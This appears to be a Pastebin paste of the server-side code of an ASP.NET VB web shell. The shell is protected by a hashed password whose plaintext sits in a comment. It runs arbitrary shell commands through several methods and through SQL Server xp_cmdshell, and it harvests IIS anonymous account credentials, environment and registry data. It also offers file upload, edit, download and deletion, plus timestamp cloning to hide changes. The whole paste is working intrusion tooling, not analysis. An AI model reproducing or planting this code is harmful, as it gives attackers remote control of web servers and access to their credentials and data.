SHARE
TWEET

Untitled

a guest May 27th, 2019 257 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <%@ Page ContentType="text/html" validateRequest="false" aspcompat="true"%>
  2. <%@ Import Namespace="System.IO" %>
  3. <%@ import namespace="System.Diagnostics" %>
  4. <%@ import namespace="System.Threading" %>
  5. <%@ import namespace="System.Text" %>
  6. <%@ import namespace="System.Security.Cryptography" %>
  7. <%@ Import Namespace="System.Net.Sockets"%>
  8. <%@ Assembly Name="System.DirectoryServices, Version=2.0.0.0, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A" %>
  9. <%@ import Namespace="System.DirectoryServices" %>
  10. <%@ import Namespace="Microsoft.Win32" %>
  11. <script language="VB" runat="server">
  12. Dim PASSWORD as string = "e8ff7d8d7a49a969a2cb8502eded9d79"   '   rooot
  13. dim url,TEMP1,TEMP2,TITLE as string
  14. Function GetMD5(ByVal strToHash As String) As String
  15.             Dim md5Obj As New System.Security.Cryptography.MD5CryptoServiceProvider()
  16.             Dim bytesToHash() As Byte = System.Text.Encoding.ASCII.GetBytes(strToHash)
  17.             bytesToHash = md5Obj.ComputeHash(bytesToHash)
  18.             Dim strResult As String = ""
  19.             Dim b As Byte
  20.             For Each b In bytesToHash
  21.                 strResult += b.ToString("x2")
  22.             Next
  23.             Return strResult
  24. End Function
  25. Sub Login_click(sender As Object, E As EventArgs)
  26.   if GetMD5(Textbox.Text)=PASSWORD then    
  27.         session("rooot")=1
  28.         session.Timeout=60
  29.     else
  30.         response.Write("<font color='red'>Your password is wrong! Maybe you press the ""Caps Lock"" buttom. Try again.</font><br>")
  31.     end if
  32. End Sub
  33. 'Run w32 shell
  34. Declare Function WinExec Lib "kernel32" Alias "WinExec" (ByVal lpCmdLine As String, ByVal nCmdShow As Long) As Long
  35. Declare Function CopyFile Lib "kernel32" Alias "CopyFileA" (ByVal lpExistingFileName As String, ByVal lpNewFileName As String, ByVal bFailIfExists As Long)  As Long
  36.  
  37. Sub RunCmdW32(Src As Object, E As EventArgs)
  38.     dim command
  39.     dim fileObject = Server.CreateObject("Scripting.FileSystemObject")     
  40.     dim tempFile = Environment.GetEnvironmentVariable("TEMP") & "\"& fileObject.GetTempName( )
  41.     If Request.Form("txtCommand1") = "" Then
  42.         command = "dir c:\"
  43.     else
  44.         command = Request.Form("txtCommand1")
  45.     End If 
  46.     ExecuteCommand1(command,tempFile,txtCmdFile.Text)
  47.     OutputTempFile1(tempFile,fileObject)
  48.     'txtCommand1.text=""
  49. End Sub
  50. Sub ExecuteCommand1(command As String, tempFile As String,cmdfile As String)
  51.     Dim winObj, objProcessInfo, item, local_dir, local_copy_of_cmd, Target_copy_of_cmd
  52.     Dim objStartup, objConfig, objProcess, errReturn, intProcessID, temp_name
  53.     Dim FailIfExists
  54.    
  55.     local_dir = left(request.servervariables("PATH_TRANSLATED"),inStrRev(request.servervariables("PATH_TRANSLATED"),"\"))
  56.     'local_copy_of_cmd = Local_dir+"cmd.exe"
  57.     'local_copy_of_cmd= "C:\\WINDOWS\\system32\\cmd.exe"
  58.     local_copy_of_cmd=cmdfile
  59.     Target_copy_of_cmd = Environment.GetEnvironmentVariable("Temp")+"\kiss.exe"
  60.     CopyFile(local_copy_of_cmd, Target_copy_of_cmd,FailIfExists)
  61.     errReturn = WinExec(Target_copy_of_cmd + " /c " + command + "  > " + tempFile , 10)
  62.     response.write(errReturn)
  63.     thread.sleep(500)
  64. End Sub
  65. Sub OutputTempFile1(tempFile,oFileSys)
  66.     On Error Resume Next
  67.     dim oFile = oFileSys.OpenTextFile (tempFile, 1, False, 0)
  68.     resultcmdw32.text=txtCommand1.text & vbcrlf & "<pre>" & (Server.HTMLEncode(oFile.ReadAll)) & "</pre>"
  69.     oFile.Close
  70.     Call oFileSys.DeleteFile(tempFile, True)     
  71. End sub
  72. 'End w32 shell
  73. 'Run WSH shell
  74. Sub RunCmdWSH(Src As Object, E As EventArgs)
  75.     dim command
  76.     dim fileObject = Server.CreateObject("Scripting.FileSystemObject")
  77.     dim oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
  78.     dim tempFile = Environment.GetEnvironmentVariable("TEMP") & "\"& fileObject.GetTempName( )
  79.     If Request.Form("txtcommand2") = "" Then
  80.         command = "dir c:\"
  81.     else
  82.         command = Request.Form("txtcommand2")
  83.     End If   
  84.     ExecuteCommand2(command,tempFile)
  85.     OutputTempFile2(tempFile,fileObject)
  86.     txtCommand2.text=""
  87. End Sub
  88. Function ExecuteCommand2(cmd_to_execute, tempFile)
  89.       Dim oScript
  90.       oScript = Server.CreateObject("WSCRIPT.SHELL")
  91.       Call oScript.Run ("cmd.exe /c " & cmd_to_execute & " > " & tempFile, 0, True)
  92. End function
  93. Sub OutputTempFile2(tempFile,fileObject)
  94.     On Error Resume Next
  95.     dim oFile = fileObject.OpenTextFile (tempFile, 1, False, 0)
  96.     resultcmdwsh.text=txtCommand2.text & vbcrlf & "<pre>" & (Server.HTMLEncode(oFile.ReadAll)) & "</pre>"
  97.     oFile.Close
  98.     Call fileObject.DeleteFile(tempFile, True)
  99. End sub
  100. 'End WSH shell
  101.  
  102. 'System infor
  103. Sub output_all_environment_variables(mode)
  104.     Dim environmentVariables As IDictionary = Environment.GetEnvironmentVariables()
  105.     Dim de As DictionaryEntry
  106.     For Each de In  environmentVariables
  107.     if mode="HTML" then
  108.     response.write("<b> " +de.Key + " </b>: " + de.Value + "<br>")
  109.     else
  110.     if mode="text"
  111.     response.write(de.Key + ": " + de.Value + vbnewline+ vbnewline)
  112.     end if     
  113.     end if
  114.     Next
  115. End sub
  116. Sub output_all_Server_variables(mode)
  117.     dim item
  118.     for each item in request.servervariables
  119.     if mode="HTML" then
  120.     response.write("<b>" + item + "</b> : ")
  121.     response.write(request.servervariables(item))
  122.     response.write("<br>")
  123.     else
  124.         if mode="text"
  125.             response.write(item + " : " + request.servervariables(item) + vbnewline + vbnewline)
  126.         end if     
  127.     end if
  128.     next
  129. End sub
  130. 'End sysinfor
  131. Function Server_variables() As String
  132.     dim item
  133.     dim tmp As String
  134.     tmp=""
  135.     for each item in request.ServerVariables
  136.         if request.servervariables(item) <> ""
  137.         'response.write(item + " : " + request.servervariables(item) + vbnewline + vbnewline)
  138.         tmp =+ item.ToString + " : " + request.servervariables(item).ToString + "\n\r"
  139.         end if
  140.     next
  141.     return tmp
  142. End function
  143. 'Begin List processes
  144. Function output_wmi_function_data(Wmi_Function,Fields_to_Show)
  145.         dim objProcessInfo , winObj, item , Process_properties, Process_user, Process_domain
  146.         dim fields_split, fields_item,i
  147.  
  148.         'on error resume next
  149.  
  150.         table("0","","")
  151.         Create_table_row_with_supplied_colors("black","white","center",Fields_to_Show)
  152.  
  153.         winObj = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")
  154.         objProcessInfo = winObj.ExecQuery("Select "+Fields_to_Show+" from " + Wmi_Function)                
  155.        
  156.         fields_split = split(Fields_to_Show,",")
  157.         for each item in objProcessInfo
  158.             tr
  159.                 Surround_by_TD_and_Bold(item.properties_.item(fields_split(0)).value)
  160.                 if Ubound(Fields_split)>0 then
  161.                     for i = 1 to ubound(fields_split)
  162.                         Surround_by_TD(center_(item.properties_.item(fields_split(i)).value))              
  163.                     next
  164.                 end if
  165.             _tr
  166.         next
  167. End function
  168. Function output_wmi_function_data_instances(Wmi_Function,Fields_to_Show,MaxCount)
  169.         dim objProcessInfo , winObj, item , Process_properties, Process_user, Process_domain
  170.         dim fields_split, fields_item,i,count
  171.         newline
  172.         rw("Showing the first " + cstr(MaxCount) + " Entries")
  173.         newline
  174.         newline
  175.         table("1","","")
  176.         Create_table_row_with_supplied_colors("black","white","center",Fields_to_Show)
  177.         _table
  178.         winObj = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")
  179. '       objProcessInfo = winObj.ExecQuery("Select "+Fields_to_Show+" from " + Wmi_Function)                
  180.         objProcessInfo = winObj.InstancesOf(Wmi_Function)                  
  181.        
  182.         fields_split = split(Fields_to_Show,",")
  183.         count = 0
  184.         for each item in objProcessInfo    
  185.             count = Count + 1
  186.             table("1","","")
  187.             tr
  188.                 Surround_by_TD_and_Bold(item.properties_.item(fields_split(0)).value)
  189.                 if Ubound(Fields_split)>0 then
  190.                     for i = 1 to ubound(fields_split)
  191.                         Surround_by_TD(item.properties_.item(fields_split(i)).value)               
  192.                     next
  193.                 end if
  194.             _tr
  195.             if count > MaxCount then exit for
  196.         next
  197. End function
  198. 'End List processes
  199. 'Begin IIS_list_Anon_Name_Pass
  200. Sub IIS_list_Anon_Name_Pass()
  201.         Dim IIsComputerObj, iFlags ,providerObj ,nodeObj ,item, IP
  202.        
  203.         IIsComputerObj = CreateObject("WbemScripting.SWbemLocator")             ' Create an instance of the IIsComputer object
  204.         providerObj = IIsComputerObj.ConnectServer("127.0.0.1", "root/microsoftIISv2")
  205.         nodeObj  = providerObj.InstancesOf("IIsWebVirtualDirSetting") '  - IISwebServerSetting
  206.        
  207.         Dim MaxCount = 20,Count = 0
  208.         hr
  209.         RW("only showing the first "+cstr(MaxCount) + " items")
  210.         hr
  211.         for each item in nodeObj
  212.             response.write("<b>" + item.AppFriendlyName + " </b> -  ")
  213.             response.write("(" + item.AppPoolId + ") ")
  214.        
  215.             response.write(item.AnonymousUserName + " : ")
  216.             response.write(item.AnonymousUserPass)
  217.            
  218.             response.write("<br>")
  219.            
  220.             response.flush
  221.             Count = Count +1
  222.             If Count > MaxCount then exit for
  223.         next       
  224.         hr
  225. End sub
  226. 'End IIS_list_Anon_Name_Pass
  227. Private Function CheckIsNumber(ByVal sSrc As String) As Boolean
  228.     Dim reg As New System.Text.RegularExpressions.Regex("^0|[0-9]*[1-9][0-9]*$")
  229.       If reg.IsMatch(sSrc) Then
  230.             Return True
  231.       Else
  232.             Return False
  233.       End If
  234. End Function
  235.  
  236. Public Function IISSpy() As String
  237.       Dim iisinfo As String = ""
  238.       Dim iisstart As String = ""
  239.       Dim iisend As String = ""
  240.       Dim iisstr As String = "IIS://localhost/W3SVC"
  241.       Dim i As Integer = 0
  242.       Try
  243.             Dim mydir As New DirectoryEntry(iisstr)
  244.             iisstart = "<TABLE width=100% align=center border=0><TR align=center><TD width=5%><B>Order</B></TD><TD width=20%><B>IIS_USER</B></TD><TD width=20%><B>App_Pool_Id</B></TD><TD width=25%><B>Domain</B></TD><TD width=30%><B>Path</B></TD></TR>"
  245.             For Each child As DirectoryEntry In mydir.Children
  246.                   If CheckIsNumber(child.Name.ToString()) Then
  247.                         Dim dirstr As String = child.Name.ToString()
  248.                         Dim tmpstr As String = ""
  249.                         Dim newdir As New DirectoryEntry(iisstr + "/" + dirstr)
  250.                         Dim newdir1 As DirectoryEntry = newdir.Children.Find("root", "IIsWebVirtualDir")
  251.                         i = i + 1
  252.                         iisinfo += "<TR><TD align=center>" + i.ToString() + "</TD>"
  253.                         iisinfo += "<TD align=center>" + newdir1.Properties("AnonymousUserName").Value.ToString() + "</TD>"
  254.                         iisinfo += "<TD align=center>" + newdir1.Properties("AppPoolId").Value.ToString() + "</TD>"
  255.                         iisinfo += "<TD>" + child.Properties("ServerBindings")(0) + "</TD>"
  256.                         iisinfo += "<TD><a href="+Request.ServerVariables("PATH_INFO")+ "?action=goto&src=" + newdir1.Properties("Path").Value.ToString() + "\>" + newdir1.Properties("Path").Value + "\</a></TD>"
  257.                         iisinfo += "</TR>"
  258.                   End If
  259.             Next
  260.             iisend = "</TABLE>"
  261.       Catch ex As Exception
  262.             Return ex.Message
  263.       End Try
  264.       Return iisstart + iisinfo + iisend
  265. End Function
  266.  
  267. Sub RegistryRead(Src As Object, E As EventArgs)
  268.     Try
  269.             Dim regkey As String = txtRegKey.Text
  270.             Dim subkey As String = regkey.Substring(regkey.IndexOf("\") + 1, regkey.Length - regkey.IndexOf("\") - 1)
  271.             Dim rk As RegistryKey = Nothing
  272.             Dim buffer As Object
  273.             Dim regstr As String = ""
  274.             If regkey.Substring(0, regkey.IndexOf("\")) = "HKEY_LOCAL_MACHINE" Then
  275.                   rk = Registry.LocalMachine.OpenSubKey(subkey)
  276.             End If
  277.             If regkey.Substring(0, regkey.IndexOf("\")) = "HKEY_CLASSES_ROOT" Then
  278.                   rk = Registry.ClassesRoot.OpenSubKey(subkey)
  279.             End If
  280.             If regkey.Substring(0, regkey.IndexOf("\")) = "HKEY_CURRENT_USER" Then
  281.                   rk = Registry.CurrentUser.OpenSubKey(subkey)
  282.             End If
  283.             If regkey.Substring(0, regkey.IndexOf("\")) = "HKEY_USERS" Then
  284.                   rk = Registry.Users.OpenSubKey(subkey)
  285.             End If
  286.             If regkey.Substring(0, regkey.IndexOf("\")) = "HKEY_CURRENT_CONFIG" Then
  287.                   rk = Registry.CurrentConfig.OpenSubKey(subkey)
  288.             End If
  289.             buffer = rk.GetValue(txtRegValue.Text, "NULL")
  290.         dim tmpbyte As Byte = 0
  291.                   lblresultReg.Text = "<br>Result : " + buffer.ToString()
  292.       Catch ex As Exception
  293.             Response.write(ex.Message)
  294.       End Try
  295. End Sub
  296.  
  297. ' Begin List Web Site Home Directory Properties
  298.  
  299.  
  300. ' End List Web Site Home Directory Properties
  301. Sub RunCMD(Src As Object, E As EventArgs)
  302.     Try
  303.     Dim kProcess As New Process()
  304.     Dim kProcessStartInfo As New ProcessStartInfo("cmd.exe")
  305.     kProcessStartInfo.UseShellExecute = False
  306.     kProcessStartInfo.RedirectStandardOutput = true
  307.     kProcess.StartInfo = kProcessStartInfo
  308.     kProcessStartInfo.Arguments="/c " & Cmd.text
  309.     kProcess.Start()
  310.     Dim myStreamReader As StreamReader = kProcess.StandardOutput
  311.     Dim myString As String = myStreamReader.Readtoend()
  312.     kProcess.Close()
  313.     result.text=Cmd.text & vbcrlf & "<pre>" & mystring & "</pre>"
  314.     Cmd.text=""
  315.     Catch
  316.     result.text="This function has disabled!"
  317.     End Try
  318. End Sub
  319. Sub CloneTime(Src As Object, E As EventArgs)
  320.     existdir(time1.Text)
  321.     existdir(time2.Text)
  322.     Dim thisfile As FileInfo =New FileInfo(time1.Text)
  323.     Dim thatfile As FileInfo =New FileInfo(time2.Text)
  324.     thisfile.LastWriteTime = thatfile.LastWriteTime
  325.     thisfile.LastAccessTime = thatfile.LastAccessTime
  326.     thisfile.CreationTime = thatfile.CreationTime
  327.     response.Write("<font color=""red"">Clone Time Success!</font>")
  328. End Sub
  329. sub Editor(Src As Object, E As EventArgs)
  330.     dim mywrite as new streamwriter(filepath.text,false,encoding.default)
  331.     mywrite.write(content.text)
  332.     mywrite.close
  333.     response.Write("<script>alert('Edit|Creat " & replace(filepath.text,"\","\\") & " Success!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(Getparentdir(filepath.text)) &"'</sc" & "ript>")
  334. end sub
  335. Sub UpLoad(Src As Object, E As EventArgs)
  336.     dim filename,loadpath as string
  337.     filename=path.getfilename(UpFile.value)
  338.     loadpath=request.QueryString("src") & filename
  339.     if  file.exists(loadpath)=true then
  340.         response.Write("<script>alert('File " & replace(loadpath,"\","\\") & " have existed , upload fail!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(request.QueryString("src")) &"'</sc" & "ript>")
  341.         response.End()
  342.     end if
  343.     UpFile.postedfile.saveas(loadpath)
  344.     response.Write("<script>alert('File " & filename & " upload success!\nFile info:\n\nClient Path:" & replace(UpFile.value,"\","\\") & "\nFile Size:" & UpFile.postedfile.contentlength & " bytes\nSave Path:" & replace(loadpath,"\","\\") & "\n');")
  345.     response.Write("location.href='" & request.ServerVariables("URL") & "?action=goto&src=" & server.UrlEncode(request.QueryString("src")) & "'</sc" & "ript>")
  346. End Sub
  347. Sub NewFD(Src As Object, E As EventArgs)
  348.     url=request.form("src")
  349.     if NewFile.Checked = True then
  350.         dim mywrite as new streamwriter(url & NewName.Text,false,encoding.default)
  351.         mywrite.close
  352.         response.Redirect(request.ServerVariables("URL") & "?action=edit&src=" & server.UrlEncode(url & NewName.Text))
  353.     else
  354.         directory.createdirectory(url & NewName.Text)
  355.         response.Write("<script>alert('Creat directory " & replace(url & NewName.Text ,"\","\\") & " Success!');location.href='"& request.ServerVariables("URL") & "?action=goto&src="& server.UrlEncode(url) &"'</sc" & "ript>")
  356.     end if
  357. End Sub
  358. Sub del(a)
  359.     if right(a,1)="\" then
  360.         dim xdir as directoryinfo
  361.         dim mydir as new DirectoryInfo(a)
  362.         dim xfile as fileinfo
  363.         for each xfile in mydir.getfiles()
  364.             file.delete(a & xfile.name)
  365.         next
  366.         for each xdir in mydir.getdirectories()
  367.             call del(a & xdir.name & "\")
  368.         next
  369.         directory.delete(a)
  370.     else
  371.         file.delete(a)
  372.     end if
  373. End Sub
  374. Sub copydir(a,b)
  375.     dim xdir as directoryinfo
  376.     dim mydir as new DirectoryInfo(a)
  377.     dim xfile as fileinfo
  378.     for each xfile in mydir.getfiles()
  379.         file.copy(a & "\" & xfile.name,b & xfile.name)
  380.     next
  381.     for each xdir in mydir.getdirectories()
  382.         directory.createdirectory(b & path.getfilename(a & xdir.name))
  383.         call copydir(a & xdir.name & "\",b & xdir.name & "\")
  384.     next
  385. End Sub
  386. Sub xexistdir(temp,ow)
  387.     if directory.exists(temp)=true or file.exists(temp)=true then
  388.         if ow=0  then
  389.             response.Redirect(request.ServerVariables("URL") & "?action=samename&src=" & server.UrlEncode(url))
  390.         elseif ow=1 then
  391.             del(temp)
  392.         else
  393.             dim d as string = session("cutboard")
  394.             if right(d,1)="\" then
  395.                 TEMP1=url & second(now) & path.getfilename(mid(replace(d,"",""),1,len(replace(d,"",""))-1))
  396.             else
  397.                 TEMP2=url & second(now) & replace(path.getfilename(d),"","")
  398.             end if
  399.         end if
  400.     end if
  401. End Sub
  402. Sub existdir(temp)
  403.         if  file.exists(temp)=false and directory.exists(temp)=false then
  404.             response.Write("<script>alert('Don\'t exist " & replace(temp,"\","\\")  &" ! Is it a CD-ROM ?');</sc" & "ript>")
  405.             response.Write("<br><br><a href='javascript:history.back(1);'>Click Here Back</a>")
  406.             response.End()
  407.         end if
  408. End Sub
  409. Sub RunSQLCMD(Src As Object, E As EventArgs)
  410.     Dim adoConn,strQuery,recResult,strResult
  411.     if SqlName.Text<>"" then
  412.         adoConn=Server.CreateObject("ADODB.Connection")
  413.         adoConn.Open("Provider=SQLOLEDB.1;Password=" & SqlPass.Text & ";UID=" & SqlName.Text & ";Data Source = " & ip.Text)
  414.         If Sqlcmd.Text<>"" Then
  415.             strQuery = "exec master.dbo.xp_cmdshell '" & Sqlcmd.Text & "'"
  416.             recResult = adoConn.Execute(strQuery)
  417.             If NOT recResult.EOF Then
  418.                 Do While NOT recResult.EOF
  419.                     strResult = strResult & chr(13) & recResult(0).value
  420.                     recResult.MoveNext
  421.                 Loop
  422.             End if
  423.             recResult = Nothing
  424.             strResult = Replace(strResult," ","&nbsp;")
  425.             strResult = Replace(strResult,"<","&lt;")
  426.             strResult = Replace(strResult,">","&gt;")
  427.             resultSQL.Text=SqlCMD.Text & vbcrlf & "<pre>" & strResult & "</pre>"
  428.             SqlCMD.Text=""
  429.          End if
  430.         adoConn.Close
  431.      End if
  432.  End Sub
  433. Sub RunSQLQUERY(Src As Object, E As EventArgs)
  434.     Dim adoConn,strQuery,recResult,strResult
  435.     if txtSqlName.Text<>"" then
  436.         adoConn=Server.CreateObject("ADODB.Connection")
  437.         adoConn.Open("Provider=SQLOLEDB.1;Password=" & txtSqlPass.Text & ";UID=" & txtSqlName.Text & ";Data Source = " & txtHost.Text)
  438.         If txtSqlcmd.Text<>"" Then
  439.             strQuery = txtSqlcmd.Text
  440.             recResult = adoConn.Execute(strQuery)
  441.             If NOT recResult.EOF Then
  442.                 Do While NOT recResult.EOF
  443.                     strResult = strResult & chr(13) & recResult(0).value
  444.                     recResult.MoveNext
  445.                 Loop
  446.             End if
  447.             recResult = Nothing
  448.             strResult = Replace(strResult," ","&nbsp;")
  449.             strResult = Replace(strResult,"<","&lt;")
  450.             strResult = Replace(strResult,">","&gt;")
  451.             lblresultSQL.Text=txtSqlCMD.Text & vbcrlf & "<pre>" & strResult & "</pre>"
  452.             txtSqlCMD.Text=""
  453.          End if
  454.         adoConn.Close
  455.      End if
  456.  End Sub
  457.  
  458. Function GetStartedTime(ms)
  459.     GetStartedTime=cint(ms/(1000*60*60))
  460. End function
  461. Function getIP()
  462.     Dim strIPAddr as string
  463.     If Request.ServerVariables("HTTP_X_FORWARDED_FOR") = "" OR InStr(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), "unknown") > 0 Then
  464.         strIPAddr = Request.ServerVariables("REMOTE_ADDR")
  465.     ElseIf InStr(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), ",") > 0 Then
  466.         strIPAddr = Mid(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), 1, InStr(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), ",")-1)
  467.     ElseIf InStr(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), ";") > 0 Then
  468.         strIPAddr = Mid(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), 1, InStr(Request.ServerVariables("HTTP_X_FORWARDED_FOR"), ";")-1)
  469.     Else
  470.         strIPAddr = Request.ServerVariables("HTTP_X_FORWARDED_FOR")
  471.     End If
  472.     getIP = Trim(Mid(strIPAddr, 1, 30))
  473. End Function
  474. Function Getparentdir(nowdir)
  475.     dim temp,k as integer
  476.     temp=1
  477.     k=0
  478.     if len(nowdir)>4 then
  479.         nowdir=left(nowdir,len(nowdir)-1)
  480.     end if
  481.     do while temp<>0
  482.         k=temp+1
  483.         temp=instr(temp,nowdir,"\")
  484.         if temp =0 then
  485.             exit do
  486.         end if
  487.         temp = temp+1
  488.     loop
  489.     if k<>2 then
  490.         getparentdir=mid(nowdir,1,k-2)
  491.     else
  492.         getparentdir=nowdir
  493.     end if
  494. End function
  495. Function Rename()
  496.     url=request.QueryString("src")
  497.     if file.exists(Getparentdir(url) & request.Form("name")) then
  498.         rename=0  
  499.     else
  500.         file.copy(url,Getparentdir(url) & request.Form("name"))
  501.         del(url)
  502.         rename=1
  503.     end if
  504. End Function
  505. Function GetSize(temp)
  506.     if temp < 1024 then
  507.         GetSize=temp & " bytes"
  508.     else
  509.         if temp\1024 < 1024 then
  510.             GetSize=temp\1024 & " KB"
  511.         else
  512.             if temp\1024\1024 < 1024 then
  513.                 GetSize=temp\1024\1024 & " MB"
  514.             else
  515.                 GetSize=temp\1024\1024\1024 & " GB"
  516.             end if
  517.         end if
  518.     end if
  519. End Function
  520. Sub downTheFile(thePath)
  521.         dim stream
  522.         stream=server.createObject("adodb.stream")
  523.         stream.open
  524.         stream.type=1
  525.         stream.loadFromFile(thePath)
  526.         response.addHeader("Content-Disposition", "attachment; filename=" & replace(server.UrlEncode(path.getfilename(thePath)),"+"," "))
  527.         response.addHeader("Content-Length",stream.Size)
  528.         response.charset="UTF-8"
  529.         response.contentType="application/octet-stream"
  530.         response.binaryWrite(stream.read)
  531.         response.flush
  532.         stream.close
  533.         stream=nothing
  534.         response.End()
  535. End Sub
  536. 'H T M L  S N I P P E T S
  537. public sub Newline
  538.         response.write("<BR>")
  539.     end sub
  540.    
  541.     public sub TextNewline
  542.         response.write(vbnewline)
  543.     end sub
  544.  
  545.     public sub rw(text_to_print)      ' Response.write
  546.         response.write(text_to_print)
  547.     end sub
  548.  
  549.     public sub rw_b(text_to_print)
  550.         rw("<b>"+text_to_print+"</b>")
  551.     end sub
  552.  
  553.     public sub hr()
  554.         rw("<hr>")
  555.     end sub
  556.  
  557.     public sub ul()
  558.         rw("<ul>")
  559.     end sub
  560.  
  561.     public sub _ul()
  562.         rw("</ul>")
  563.     end sub
  564.  
  565.     public sub table(border_size,width,height)
  566.         rw("<table border='"+cstr(border_size)+"' width ='"+cstr(width)+"' height='"+cstr(height)+"'>")
  567.     end sub
  568.  
  569.     public sub _table()
  570.         rw("</table>")
  571.     end sub
  572.  
  573.     public sub tr()
  574.         rw("<tr>")
  575.     end sub
  576.  
  577.     public sub _tr()
  578.         rw("</tr>")
  579.     end sub
  580.  
  581.     public sub td()
  582.         rw("<td>")
  583.     end sub
  584.  
  585.     public sub _td()
  586.         rw("</td>")
  587.     end sub
  588.  
  589.     public sub td_span(align,name,contents)
  590.         rw("<td align="+align+"><span id='"+name+"'>"+ contents + "</span></td>")
  591.     end sub
  592.  
  593.     Public sub td_link(align,title,link,target)
  594.         rw("<td align="+align+"><a href='"+link+"' target='"+target+"'>"+title+"</a></td>")
  595.     end sub
  596.  
  597.     Public sub link(title,link,target)
  598.         rw("<a href='"+link+"' target='"+target+"'>"+title+"</a>")
  599.     end sub
  600.  
  601.     Public sub link_hr(title,link,target)
  602.         rw("<a href='"+link+"' target='"+target+"'>"+title+"</a>")
  603.         hr
  604.     end sub
  605.  
  606.     Public sub link_newline(title,link,target)
  607.         rw("<a href='"+link+"' target='"+target+"'>"+title+"</a>")
  608.         newline
  609.     end sub
  610.    
  611.     public sub empty_Cell(ColSpan)
  612.         rw("<td colspan='"+cstr(colspan)+"'></td>")
  613.     end sub
  614.  
  615.     public sub empty_row(ColSpan)
  616.         rw("<tr><td colspan='"+cstr(colspan)+"'></td></tr>")
  617.     end sub
  618.  
  619.         Public sub Create_table_row_with_supplied_colors(bgColor, fontColor, alignValue, rowItems)
  620.             dim rowItem
  621.  
  622.             rowItems = split(rowItems,",")
  623.             response.write("<tr bgcolor="+bgcolor+">")
  624.             for each rowItem in RowItems
  625.                 response.write("<td align="+alignValue+"><font color="+fontColor+"><b>"+rowItem +"<b></font></td>")
  626.             next
  627.             response.write("</tr>")
  628.  
  629.         end sub
  630.  
  631.         Public sub TR_TD(cellContents)
  632.             response.write("<td>")
  633.             response.write(cellContents)
  634.             response.write("</td>")
  635.         end sub
  636.    
  637.  
  638.         Public sub Surround_by_TD(cellContents)
  639.             response.write("<td>")
  640.             response.write(cellContents)
  641.             response.write("</td>")
  642.         end sub
  643.  
  644.         Public sub Surround_by_TD_and_Bold(cellContents)
  645.             response.write("<td><b>")
  646.             response.write(cellContents)
  647.             response.write("</b></td>")
  648.         end sub
  649.  
  650.         Public sub Surround_by_TD_with_supplied_colors_and_bold(bgColor, fontColor, alignValue, cellContents)
  651.             response.write("<td align="+alignValue+" bgcolor="+bgcolor+" ><font color="+fontColor+"><b>")
  652.             response.write(cellContents)
  653.             response.write("</b></font></td>")
  654.         end sub
  655.     Public sub Create_background_Div_table(title,main_cell_contents,top,left,width,height,z_index)
  656.         response.write("<div style='position: absolute; top: " + top + "; left: " + left + "; width: "+width+"; height: "+height+"; z-index: "+z_index+"'>")
  657.         response.write("  <table border='1' cellpadding='0' cellspacing='0' style='border-collapse: collapse' bordercolor='#111111' width='100%' id='AutoNumber1' height='100%'>")
  658.         response.write("    <tr heigth=20>")
  659.         response.write("      <td bgcolor='black' align=center><font color='white'><b>"+ title +"</b></font></td>")
  660.         response.write("    </tr>")
  661.         response.write("    <tr>")
  662.         response.write("      <td>"+main_Cell_contents+"</td>")
  663.         response.write("    </tr>")
  664.         response.write("  </table>")
  665.         response.write("</div>")
  666.     end sub
  667.  
  668.     Public sub Create_Div_open(top,left,width,height,z_index)
  669.         response.write("<div style='position: absolute; top: " + top + "; left: " + left + "; width: "+width+"; height: "+height+"; z-index: "+z_index+"'>")
  670.     end sub
  671.  
  672.  
  673.     Public sub Create_Div_close()
  674.         response.write("</div>")
  675.     end sub
  676.  
  677.     public sub Create_Iframe(left, top, width, height, name,src)
  678.         rw("<span style='position: absolute; left: " + left+ "; top: " +top + "'>")  
  679.         rw("    <iframe name='" + name+ "' src='" + src+ "' width='" + cstr(width) + "' height='" + cstr(height) + "'></iframe>")
  680.             rw("</span>")
  681.     end sub
  682.  
  683.     public sub Create_Iframe_relative(width, height, name,src)
  684.         rw("    <iframe name='" + name+ "' src='" + src+ "' width='" + cstr(width) + "' height='" + cstr(height) + "'></iframe>")
  685.     end sub
  686.  
  687.     public sub return_100_percent_table()
  688.         rw("<table border width='100%' height='100%'><tr><td>sdf</td></tr></table>")
  689.     end sub
  690.  
  691.     public sub font_size(size)
  692.         rw("<font size="+size+">")
  693.     end sub
  694.  
  695.     public sub end_font()
  696.         rw("</font>")
  697.     end sub
  698.  
  699.     public sub red(contents)
  700.         rw("<font color=red>"+contents+"</font>")
  701.     end sub
  702.  
  703.     public sub yellow(contents)
  704.         rw("<font color='#FF8800'>"+contents+"</font>")
  705.     end sub
  706.  
  707.     public sub green(contents)
  708.         rw("<font color=green>"+contents+"</font>")
  709.     end sub
  710.     public sub print_var(var_name, var_value,var_description)
  711.         if var_description<> "" Then
  712.             rw(b_(var_name)+" : " + var_value + i_("  ("+var_description+")"))
  713.         else
  714.             rw(b_(var_name)+" : " + var_value)
  715.         end if
  716.         newline
  717.     end sub
  718.  
  719. ' Functions
  720.  
  721.     public function br_()
  722.         br_ = "<br>"
  723.     end function
  724.  
  725.     public function b_(contents)
  726.         b_ = "<b>"+ contents + "</b>"
  727.     end function
  728.  
  729.     public function i_(contents)
  730.         i_ = "<i>"+ contents + "</i>"
  731.     end function
  732.  
  733.     public function li_(contents)
  734.         li_ = "<li>"+ contents + "</li>"
  735.     end function
  736.  
  737.     public function h1_(contents)
  738.         h1_ = "<h1>"+ contents + "</h1>"
  739.     end function
  740.  
  741.     public function h2_(contents)
  742.         h2_ = "<h2>"+ contents + "</h2>"
  743.     end function
  744.  
  745.     public function h3_(contents)
  746.         h3_ = "<h3>"+ contents + "</h3>"
  747.     end function
  748.  
  749.     public function big_(contents)
  750.         big_ = "<big>"+ contents + "</big>"
  751.     end function
  752.  
  753.     public function center_(contents)
  754.         center_ = "<center>"+ cstr(contents) + "</center>"
  755.     end function
